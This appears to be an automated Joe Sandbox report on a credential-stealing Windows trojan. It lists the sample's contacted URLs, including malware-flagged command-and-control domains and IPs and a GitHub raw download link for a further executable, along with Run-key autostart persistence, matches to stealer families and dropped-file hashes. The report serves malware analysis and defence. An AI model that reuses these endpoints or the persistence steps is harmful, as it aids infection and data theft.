                                                                                        http://microsoft.cojyidkjkfhjawd.exe, 00000041.00000003.2822393394.000000000075F000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2807665436.0000000000761000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://pancakedipyps.click/apiS64252d274d.exe, 00000024.00000003.2360817583.0000000003A5E000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2340581903.0000000003A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://contoso.com/Iconpowershell.exe, 00000035.00000002.2538930366.000001732B202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://ocsp.rootca1.amazontrust.com0:EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://framekgirus.shop/Njyidkjkfhjawd.exe, 00000041.00000003.2820429213.00000000007C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                https://www.ecosia.org/newtab/EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://lv.queniujq.cn696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://steamcommunity.com/profiles/76561199724331900/inventory/696689ce6d.exe, 0000002F.00000003.4862231655.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4825063904.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4847052772.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886389394.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4822742633.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4849099979.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858982732.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.youtube.com/696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000035.00000002.2538930366.0000017329A9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://framekgirus.shop/Pjyidkjkfhjawd.exe, 00000041.00000003.2564282324.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.execbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000002FEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://lev-tolstoi.com/api696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4897428890.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4898729473.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858982732.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4901441862.00000000009FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001F.00000002.2276089201.0000000004C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.00000000052A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.google.com/recaptcha/696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://checkout.steampowered.com/696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgEdYEXasNiR.exe, 00000000.00000003.1616651541.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616808855.0000000005F6F000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616331109.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2221527701.000000000BB1E000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2367759874.0000000001547000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612191991.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612630439.00000000007FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://framekgirus.shop/4jyidkjkfhjawd.exe, 00000041.00000003.2509192980.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          unknown
                                                                                                                          https://pancakedipyps.click/api$64252d274d.exe, 00000024.00000003.2360817583.0000000003A5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          unknown
                                                                                                                          https://pancakedipyps.click/((64252d274d.exe, 00000024.00000003.2344378819.0000000003A5E000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2344227223.0000000003A57000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2344051395.0000000003A53000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          unknown
                                                                                                                          https://pancakedipyps.click/api#64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          unknown
                                                                                                                          https://lev-tolstoi.com:443/apiCG696689ce6d.exe, 0000002F.00000003.4897375001.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858731214.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4905041657.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4838267197.000000000348C000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4838753795.000000000348C000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4846955753.0000000003491000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886283552.0000000003493000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          unknown
                                                                                                                          http://185.215.113.206/68b591d6548ec281/vcruntime140.dllDX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://185.215.113.206/c4becf79229cb002.phpdDX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://help.steampowered.com/en/696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://185.215.113.206/c4becf79229cb002.phpgDX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://framekgirus.shop/#jyidkjkfhjawd.exe, 00000041.00000003.2699359734.0000000003ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  unknown
                                                                                                                                  https://energyaffai.lat/api696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  unknown
                                                                                                                                  https://recaptcha.net/recaptcha/;696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://pancakedipyps.click/apibv64252d274d.exe, 00000024.00000003.2430484562.0000000001521000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    unknown
                                                                                                                                    http://185.215.113.206/c4becf79229cb002.phpAZDX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    unknown
                                                                                                                                    http://185.215.113.43/Zu7JuNko/index.php7skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    unknown
                                                                                                                                    https://broadcast.st.dl.eccdnx.com696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://lev-tolstoi.com/apilg696689ce6d.exe, 0000002F.00000003.4886583987.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4900783883.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4859195796.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582828
Start date and time: 2024-12-31 15:40:39 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 20m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 110
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: EdYEXasNiR.exe
renamed because original name is a hash value
Original Sample Name: 0be97a686bb58f470d1d096a12097fa8.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winEXE@154/1065@0/23
EGA Information:
• Successful, ratio: 66.7%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Max analysis timeout: 600s exceeded, the analysis took too long
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Execution Graph export aborted for target DX0TGIT2LZWIIEDZ8Y3A15R.exe, PID 2656 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Skipping network analysis since amount of network traffic is too extensive
Time      Type             Description
09:42:07  API Interceptor  10x Sleep call for process: EdYEXasNiR.exe modified
09:42:55  API Interceptor  92x Sleep call for process: DX0TGIT2LZWIIEDZ8Y3A15R.exe modified
09:43:03  API Interceptor  13699730x Sleep call for process: skotes.exe modified
09:43:16  API Interceptor  107x Sleep call for process: powershell.exe modified
09:43:21  API Interceptor  8x Sleep call for process: 64252d274d.exe modified
09:43:30  API Interceptor  27x Sleep call for process: cbfb8a9c89.exe modified
09:43:36  API Interceptor  19x Sleep call for process: jyidkjkfhjawd.exe modified
09:47:12  API Interceptor  10x Sleep call for process: 696689ce6d.exe modified
15:42:33  Task Scheduler   Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
15:43:15  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
15:43:24  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
15:44:31  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 8663788bd2.exe C:\Users\user\AppData\Local\Temp\1027568001\8663788bd2.exe
15:44:40  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run f2a96255ac.exe C:\Users\user\AppData\Local\Temp\1027569001\f2a96255ac.exe
15:44:50  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 85c59433f4.exe C:\Users\user\AppData\Local\Temp\1027570001\85c59433f4.exe
15:45:01  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ccb71f0bac.exe C:\Users\user\AppData\Local\Temp\1027571001\ccb71f0bac.exe
15:45:12  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 8663788bd2.exe C:\Users\user\AppData\Local\Temp\1027568001\8663788bd2.exe
15:45:22  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run f2a96255ac.exe C:\Users\user\AppData\Local\Temp\1027569001\f2a96255ac.exe
15:45:35  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 85c59433f4.exe C:\Users\user\AppData\Local\Temp\1027570001\85c59433f4.exe
15:45:48  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ccb71f0bac.exe C:\Users\user\AppData\Local\Temp\1027571001\ccb71f0bac.exe
15:46:01  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run eIgpINK.exe C:\Users\user\AppData\Local\Temp\1027573001\eIgpINK.exe
15:46:18  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run eIgpINK.exe C:\Users\user\AppData\Local\Temp\1027573001\eIgpINK.exe
Match  Associated Sample Name / URL  SHA 256  Detection  Threat Name  Link  Context
No context
Match  Associated Sample Name / URL  SHA 256  Detection  Threat Name  Link  Context
                                                                                                                                                                                                            Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            CLOUDFLARENETUSSMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            DypA6KbLrn.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.87.65
                                                                                                                                                                                                            IOnqEVA4Dz.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.129.82
                                                                                                                                                                                                            HngJMpDqxP.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            https://br.custmercompa.de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.139.222
                                                                                                                                                                                                            tyPafmiT0t.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                            • 104.21.85.189
                                                                                                                                                                                                            Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                                                                            • 172.67.196.114
                                                                                                                                                                                                            Statement of Account - USD 16,720.00.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                                            MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\freebl3.dll | 5EfYBe3nch.exe | malicious | LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc
C:\ProgramData\freebl3.dll | random.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | 8WFJ38EJo5.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar
C:\ProgramData\freebl3.dll | w22319us3M.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
C:\ProgramData\freebl3.dll | 5uVReRlvME.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc
C:\ProgramData\freebl3.dll | DRWgoZo325.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar
C:\ProgramData\freebl3.dll | i8Vwc7iOaG.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar
C:\ProgramData\freebl3.dll | glpEv3POe7.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | gYjK72gL17.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | iUKUR1nUyD.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar
C:\ProgramData\mozglue.dll | 5EfYBe3nch.exe | malicious | LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc
C:\ProgramData\mozglue.dll | random.exe | malicious | Stealc, Vidar
C:\ProgramData\mozglue.dll | 8WFJ38EJo5.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar
C:\ProgramData\mozglue.dll | w22319us3M.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
C:\ProgramData\mozglue.dll | 5uVReRlvME.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc
C:\ProgramData\mozglue.dll | DRWgoZo325.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar
C:\ProgramData\mozglue.dll | i8Vwc7iOaG.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar
C:\ProgramData\mozglue.dll | glpEv3POe7.exe | malicious | Stealc, Vidar
C:\ProgramData\mozglue.dll | gYjK72gL17.exe | malicious | Stealc, Vidar
C:\ProgramData\mozglue.dll | iUKUR1nUyD.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                    Encrypted:false
